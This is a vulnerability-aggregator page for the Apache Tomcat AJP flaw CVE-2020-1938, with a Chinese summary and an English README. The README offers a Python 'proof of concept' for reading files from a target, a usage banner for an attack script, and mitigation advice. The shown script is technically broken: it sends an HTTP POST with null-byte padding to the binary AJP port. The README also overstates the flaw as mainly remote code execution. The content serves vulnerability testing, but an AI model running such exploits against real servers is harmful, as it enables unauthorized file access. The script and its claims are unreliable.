关联漏洞
标题:
Apache Tomcat 安全漏洞
(CVE-2020-1938)
描述:Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat 7.0.100版本之前的7.*版本、8.5.51版本之前的8.*版本和9.0.31版本之前的9.*版本中的Tomcat AJP协议存在安全漏洞。攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件,如 webapp 配置文件或源代码等。
描述
poc-CVE-2020-1938
介绍
# About
CVE-2020-1938 is a critical vulnerability affecting the Apache Tomcat server that allows remote code execution (RCE). It specifically concerns the AJP (Apache JServ Protocol) connector, which is often enabled by default. This vulnerability arises from the improper handling of requests, allowing an attacker to exploit the AJP interface to read arbitrary files on the server or even execute commands.
## Understanding CVE-2020-1938
- **Description**: The vulnerability exists in the way Tomcat processes AJP requests. An attacker can craft a malicious request that exploits this vulnerability, potentially leading to unauthorized access to sensitive information or execution of arbitrary code. The flaw is primarily tied to Tomcat configurations where the AJP connector is exposed to the internet without adequate protections.
- **Affected Versions**: This vulnerability affects multiple versions of Apache Tomcat, specifically those where the AJP connector is enabled. Users of Tomcat 7.x, 8.x, and 9.x need to be particularly vigilant.
- **Impact**: Successful exploitation can lead to severe security breaches, including unauthorized file access, data leaks, and remote code execution. As a result, it is critical for organizations to take proactive measures to mitigate this risk.
## Proof of Concept (PoC) for CVE-2020-1938
A proof of concept (PoC) is typically a demonstration of the vulnerability in action, allowing security professionals to test whether their systems are vulnerable. Here's how you can use a PoC for CVE-2020-1938.
### Prerequisites
1. **Environment Setup**:
- A vulnerable instance of Apache Tomcat (preferably version 7.x, 8.x, or 9.x with the AJP connector enabled).
- Access to a system where you can run Python scripts or any other script language that can make HTTP requests.
2. **Networking**: Ensure that the AJP port (default 8009) is accessible from the machine running the PoC.
### Example PoC Script
Below is a simplified Python script that demonstrates how an attacker could exploit CVE-2020-1938.
```python
import requests
# Target information
target_ip = "http://<TARGET_IP>:<AJP_PORT>"
payload = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + b"/path/to/file" + b'\x00'
# Crafting the exploit
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"X-Forwarded-For": "127.0.0.1",
"User-Agent": "Mozilla/5.0"
}
# Sending the request
try:
response = requests.post(target_ip, data=payload, headers=headers, timeout=5)
if response.status_code == 200:
print("Exploit successful, response:")
print(response.text)
else:
print("Exploit failed, status code:", response.status_code)
except Exception as e:
print("An error occurred:", str(e))
```
## Mitigation Strategies
1. **Configuration Changes**: Disable the AJP connector if it is not needed. If it is required, restrict access using firewall rules.
2. **Upgrade Tomcat**: Ensure you are using a version of Tomcat that is not vulnerable to CVE-2020-1938. Always apply security updates promptly.
3. **Monitoring and Logging**: Implement monitoring solutions to track unusual activity on your Tomcat servers. Log all access to the AJP connector for later analysis.
4. **Network Security**: Use network segmentation to ensure that only trusted networks can access your application servers, particularly those using AJP.
# Usage
```
usage: CVE-2020-1938.py [-h] [-p PORT] [-f FILE] target
positional arguments:
target Hostname or IP to attack
options:
-h, --help show this help message and exit
-p PORT, --port PORT AJP port to attack (default is 8009)
-f FILE, --file FILE file path on the server(default is WEB-INF/web.xml)
```
文件快照
[4.0K] /data/pocs/17132e0c1ef55947d73835a53b99212d7ac60a17
├── [ 16K] cve-2020-1938.py
└── [3.7K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。